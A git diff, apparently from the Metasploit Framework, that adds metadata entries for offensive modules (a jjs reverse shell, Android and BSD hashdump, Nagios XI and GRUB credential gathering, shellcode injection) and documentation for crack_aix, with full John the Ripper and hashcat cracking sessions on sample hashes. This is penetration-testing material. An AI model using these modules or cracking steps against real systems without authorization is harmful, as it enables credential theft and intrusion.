   "payload_cmd/unix/bind_lua": {
     "name": "Unix Command Shell, Bind TCP (via Lua)",
     "fullname": "payload/cmd/unix/bind_lua",
@@ -142322,6 +144362,42 @@
     },
     "needs_cleanup": false
   },
+  "payload_cmd/unix/reverse_jjs": {
+    "name": "Unix Command Shell, Reverse TCP (via jjs)",
+    "fullname": "payload/cmd/unix/reverse_jjs",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "conerpirate",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Connect back and create a command shell via jjs",
+    "references": [
+      "URL-https://gtfobins.github.io/gtfobins/jjs/",
+      "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/",
+      "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-21 16:38:18 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_jjs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "payload_cmd/unix/reverse_ksh": {
     "name": "Unix Command Shell, Reverse TCP (via Ksh)",
     "fullname": "payload/cmd/unix/reverse_ksh",
@@ -143246,7 +145322,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-04-26 08:40:07 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell_bind_tcp",
@@ -143280,7 +145356,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-04-26 08:40:07 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell_reverse_tcp",
@@ -149896,7 +151972,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-10 22:08:26 +0000",
     "path": "/modules/payloads/stagers/python/reverse_http.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/reverse_http",
@@ -149929,7 +152005,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-10 22:08:26 +0000",
     "path": "/modules/payloads/stagers/python/reverse_https.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/reverse_https",
@@ -150097,7 +152173,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-23 08:45:43 +0000",
+    "mod_time": "2019-10-10 22:08:26 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_reverse_http",
@@ -150130,7 +152206,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-23 08:45:43 +0000",
+    "mod_time": "2019-10-10 22:08:26 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_reverse_https",
@@ -151862,7 +153938,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
     "path": "/modules/payloads/singles/windows/format_all_drives.rb",
     "is_install_path": true,
     "ref_name": "windows/format_all_drives",
@@ -151870,6 +153946,9 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "AKA": [
+        "ShellcodeOfDeath"
+      ]
     },
     "needs_cleanup": false
   },
@@ -154697,7 +156776,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-04-26 08:40:07 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/powershell_bind_tcp",
@@ -154733,7 +156812,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-04-26 08:40:07 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/powershell_reverse_tcp",
@@ -158074,7 +160153,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-04-26 08:40:07 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/powershell_bind_tcp",
@@ -158109,7 +160188,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-04-26 08:40:07 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/powershell_reverse_tcp",
@@ -159025,6 +161104,41 @@
     },
     "needs_cleanup": null
   },
+  "post_android/gather/hashdump": {
+    "name": "Android Gather Dump Password Hashes for Android Systems",
+    "fullname": "post/android/gather/hashdump",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die",
+      "timwr"
+    ],
+    "description": "Post Module to dump the password hashes for Android System. Root is required.\n           To perform this operation, two things are needed.  First, a password.key file\n           is required as this contains the hash but no salt.  Next, a sqlite3 database\n           is needed (with supporting files) to pull the salt from.  Combined, this\n           creates the hash we need.  Samsung based devices change the hash slightly.",
+    "references": [
+      "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/",
+      "URL-https://hashcat.net/forum/thread-2202.html"
+    ],
+    "platform": "Android",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-17 13:44:19 +0000",
+    "path": "/modules/post/android/gather/hashdump.rb",
+    "is_install_path": true,
+    "ref_name": "android/gather/hashdump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_android/gather/sub_info": {
     "name": "extracts subscriber info from target device",
     "fullname": "post/android/gather/sub_info",
@@ -159260,6 +161374,39 @@
     },
     "needs_cleanup": null
   },
+  "post_bsd/gather/hashdump": {
+    "name": "BSD Dump Password Hashes",
+    "fullname": "post/bsd/gather/hashdump",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Post module to dump the password hashes for all users on a BSD system.",
+    "references": [
+
+    ],
+    "platform": "BSD",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-02 08:54:04 +0000",
+    "path": "/modules/post/bsd/gather/hashdump.rb",
+    "is_install_path": true,
+    "ref_name": "bsd/gather/hashdump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_cisco/gather/enum_cisco": {
     "name": "Cisco Gather Device General Information",
     "fullname": "post/cisco/gather/enum_cisco",
@@ -160287,6 +162434,39 @@
     },
     "needs_cleanup": null
   },
+  "post_linux/gather/enum_nagios_xi": {
+    "name": "Nagios XI Enumeration",
+    "fullname": "post/linux/gather/enum_nagios_xi",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2018-04-17",
+    "type": "post",
+    "author": [
+      "Cale Smith"
+    ],
+    "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n          creating opportunities for lateral movement.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-10-10 16:57:49 +0000",
+    "path": "/modules/post/linux/gather/enum_nagios_xi.rb",
+    "is_install_path": true,
+    "ref_name": "linux/gather/enum_nagios_xi",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
   "post_linux/gather/enum_network": {
     "name": "Linux Gather Network Information",
     "fullname": "post/linux/gather/enum_network",
@@ -161570,7 +163750,8 @@
     "disclosure_date": null,
     "type": "post",
     "author": [
-      "Dhiru Kholia <dhiru@openwall.com>"
+      "Dhiru Kholia <dhiru@openwall.com>",
+      "Henry Hoggard"
     ],
     "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n        machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
     "references": [
@@ -161582,7 +163763,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-28 10:16:59 +0000",
+    "mod_time": "2019-12-05 08:46:56 +0000",
     "path": "/modules/post/multi/gather/gpg_creds.rb",
     "is_install_path": true,
     "ref_name": "multi/gather/gpg_creds",
@@ -161593,6 +163774,41 @@
     },
     "needs_cleanup": null
   },
+  "post_multi/gather/grub_creds": {
+    "name": "Gather GRUB Password",
+    "fullname": "post/multi/gather/grub_creds",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Garvit Dewan <d.garvit@gmail.com>",
+      "Taeber Rapczak <taeber@rapczak.com>",
+      "Shelby Pace"
+    ],
+    "description": "This module gathers GRUB passwords from GRUB bootloader config files.",
+    "references": [
+      "URL-https://help.ubuntu.com/community/Grub2/Passwords#Password_Encryption"
+    ],
+    "platform": "BSD,Linux,OSX,Solaris,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-10-29 04:31:12 +0000",
+    "path": "/modules/post/multi/gather/grub_creds.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/grub_creds",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_multi/gather/irssi_creds": {
     "name": "Multi Gather IRSSI IRC Password(s)",
     "fullname": "post/multi/gather/irssi_creds",
@@ -161981,7 +164197,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-08 00:11:11 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/post/multi/gather/resolve_hosts.rb",
     "is_install_path": true,
     "ref_name": "multi/gather/resolve_hosts",
@@ -162147,7 +164363,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-04 19:24:43 +0000",
     "path": "/modules/post/multi/gather/ssh_creds.rb",
     "is_install_path": true,
     "ref_name": "multi/gather/ssh_creds",
@@ -162417,7 +164633,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-06 12:45:23 +0000",
     "path": "/modules/post/multi/manage/autoroute.rb",
     "is_install_path": true,
     "ref_name": "multi/manage/autoroute",
@@ -162920,7 +165136,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-05-05 04:41:58 +0000",
+    "mod_time": "2019-12-13 10:51:58 +0000",
     "path": "/modules/post/multi/recon/local_exploit_suggester.rb",
     "is_install_path": true,
     "ref_name": "multi/recon/local_exploit_suggester",
@@ -164300,7 +166516,7 @@
     "author": [
       "Danil Bazin <danil.bazin@hsc.fr>"
     ],
-    "description": "This module enumerates ways to decrypt bitlocker volume and if a recovery key is stored locally\n        or can be generated, dump the Bitlocker master key (FVEK)",
+    "description": "This module enumerates ways to decrypt Bitlocker volume and if a recovery key is stored locally\n        or can be generated, dump the Bitlocker master key (FVEK)",
     "references": [
       "URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc",
       "URL-http://www.hsc.fr/ressources/outils/dislocker/"
@@ -164311,7 +166527,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-01-09 06:32:22 +0000",
+    "mod_time": "2019-12-11 13:39:25 +0000",
     "path": "/modules/post/windows/gather/bitlocker_fvek.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/bitlocker_fvek",
@@ -164921,7 +167137,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-07 09:02:04 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/post/windows/gather/credentials/gpp.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/credentials/gpp",
@@ -166222,7 +168438,7 @@
     "author": [
       "Carlos Perez <carlos_perez@darkoperator.com>"
     ],
-    "description": "This module will enumerate all installed applications",
+    "description": "This module will enumerate all installed applications on a Windows system",
     "references": [
 
     ],
@@ -166232,7 +168448,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 14:10:48 +0000",
     "path": "/modules/post/windows/gather/enum_applications.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/enum_applications",
@@ -166737,7 +168953,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-16 04:07:01 +0000",
     "path": "/modules/post/windows/gather/enum_hostfile.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/enum_hostfile",
@@ -167537,7 +169753,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 14:26:34 +0000",
     "path": "/modules/post/windows/gather/forensics/recovery_files.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/forensics/recovery_files",
@@ -167609,7 +169825,7 @@
     "path": "/modules/post/windows/gather/local_admin_search_enum.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/local_admin_search_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -168884,40 +171100,6 @@
     },
     "needs_cleanup": null
   },
-  "post_windows/manage/payload_inject": {
-    "name": "Windows Manage Memory Payload Injection Module",
-    "fullname": "post/windows/manage/payload_inject",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "post",
-    "author": [
-      "Carlos Perez <carlos_perez@darkoperator.com>",
-      "David Kennedy \"ReL1K\" <kennedyd013@gmail.com>"
-    ],
-    "description": "This module will inject into the memory of a process a specified windows payload.\n        If a payload or process is not provided one will be created by default\n        using a reverse x86 TCP Meterpreter Payload.",
-    "references": [
-
-    ],
-    "platform": "Windows",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2019-07-27 19:02:33 +0000",
-    "path": "/modules/post/windows/manage/payload_inject.rb",
-    "is_install_path": true,
-    "ref_name": "windows/manage/payload_inject",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": null
-  },
   "post_windows/manage/peinjector": {
     "name": "Peinjector",
     "fullname": "post/windows/manage/peinjector",
@@ -169516,6 +171698,39 @@
     },
     "needs_cleanup": null
   },
+  "post_windows/manage/shellcode_inject": {
+    "name": "Windows Manage Memory Shellcode Injection Module",
+    "fullname": "post/windows/manage/shellcode_inject",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "phra <https://iwantmore.pizza>"
+    ],
+    "description": "This module will inject into the memory of a process a specified shellcode.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-12-12 15:19:17 +0000",
+    "path": "/modules/post/windows/manage/shellcode_inject.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/shellcode_inject",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_windows/manage/sticky_keys": {
     "name": "Sticky Keys Persistance Module",
     "fullname": "post/windows/manage/sticky_keys",

documentation/modules/auxiliary/analyze/crack_aix.md

@@ -0,0 +1,292 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode AIX 
+  based password hashes, such as:
+
+  * `DES` based passwords
+
+  Formats:
+
+| Common | John     | Hashcat |
+|--------| ---------|---------|
+| des    | descript | 1500    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with a `des` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_aix```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:des2_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_55 hash:rDpJV6xlcXxRM jtr:des
+creds add user:des_pot_55 hash:fakeV6xlcXxRM jtr:des
+creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
+echo "fakeV6xlcXxRM:55" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_aix
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-27621-1ucwc3l
+[*] Wordlist file written out to /tmp/jtrtmp20190531-27621-qk76qr
+[*] Checking descrypt hashes already cracked...
+[*] Cracking descrypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=Z5uRTsvO --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --wordlist=/tmp/jtrtmp20190531-27621-qk76qr --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-27621-1ucwc3l
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:06) 100.0g/s 1103Kp/s 4415Kc/s 4415KC/s test3:::..t1900
+Warning: passwords printed above might be partial and not be all those cracked
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking descrypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=Z5uRTsvO --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --max-run-time=60 /tmp/hashes_tmp20190531-27621-1ucwc3l
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+3g 0:00:00:00 DONE 1/3 (2019-05-31 15:06) 300.0g/s 614200p/s 614400c/s 614400C/s des_pass..Dde_pass
+Warning: passwords printed above might be partial
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking descrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=Z5uRTsvO --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-27621-1ucwc3l
+Using default input encoding: UTF-8
+[*] Cracking descrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Z5uRTsvO --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --wordlist=/tmp/jtrtmp20190531-27621-qk76qr --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-27621-1ucwc3l
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username        Cracked Password  Method
+ -----  ---------  --------        ----------------  ------
+ 1250   descrypt   des2_password   password          Single
+ 1251   descrypt   des_password    password          Single
+ 1252   descrypt   des_55          55                Normal
+ 1253   descrypt   des_pot_55      55                Already Cracked/POT
+ 1254   descrypt   des_passphrase  passphrase        Normal
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public          private                   realm  private_type        JtR Format
+----  ------  -------  ------          -------                   -----  ------------        ----------
+                       des2_password   rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_55          rDpJV6xlcXxRM                    Nonreplayable hash  des
+                       des_pot_55      fakeV6xlcXxRM                    Nonreplayable hash  des
+                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
+                       des_pot_55      55                               Password            
+                       des2_password   password                         Password            
+                       des_password    password                         Password            
+                       des_55          55                               Password            
+                       des_passphrase  passphrase                       Password
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_aix
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-27714-1ct3bn3
+[*] Wordlist file written out to /tmp/jtrtmp20190531-27714-1j3q151
+[*] Checking descrypt hashes already cracked...
+[*] Cracking descrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=wCGD0gD0 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1500 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-27714-1ct3bn3
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking descrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=wCGD0gD0 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1500 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-27714-1ct3bn3 /tmp/jtrtmp20190531-27714-1j3q151
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username       Cracked Password  Method
+ -----  ---------  --------       ----------------  ------
+ 1260   descrypt   des2_password  password          Wordlist
+ 1261   descrypt   des_password   password          Wordlist
+ 1262   descrypt   des_55         55                Incremental
+ 1263   descrypt   des_pot_55     55                Already Cracked/POT
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public          private                   realm  private_type        JtR Format
+----  ------  -------  ------          -------                   -----  ------------        ----------
+                       des2_password   rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_55          rDpJV6xlcXxRM                    Nonreplayable hash  des
+                       des_pot_55      fakeV6xlcXxRM                    Nonreplayable hash  des
+                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
+                       des_pot_55      55                               Password            
+                       des_55          55                               Password            
+                       des2_password   password                         Password            
+                       des_password    password                         Password
+```

documentation/modules/auxiliary/analyze/crack_databases.md

@@ -0,0 +1,920 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode varying databases
+  based password hashes, such as:
+
+  * `mysql` based passwords
+    * `mysql` based passwords
+    * `mysql-sha1` based passwords
+  * `mssql` based passwords
+    * `mssql` based passwords
+    * `mssql05` based passwords
+    * `mssql12` based passwords
+  * `oracle` based passwords
+    * `oracle 10` based passwords
+    * `oracle 11/12 H values` based passwords
+    * `oracle 12c` based passwords
+  * `postgres` based passwords
+
+
+| Common         | John        | Hashcat |
+|----------------|-------------|---------|
+| mysql          | mysql       | 200     |
+| mysql-sha1     | mysql-sha1  | 300     |
+| mssql          | mssql       | 131     |
+| mssql05        | mssql05     | 132     |
+| mssql12        | mssql12     | 1731    |
+| oracle 10      | oracle      | n/a     |
+| oracle 11/12 H |             | 112     |
+| oracle 12c     | sha512crypt | 12300   |
+| postgres       | postgres    | 1800    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with a database password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_databases```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **CONFIG**
+
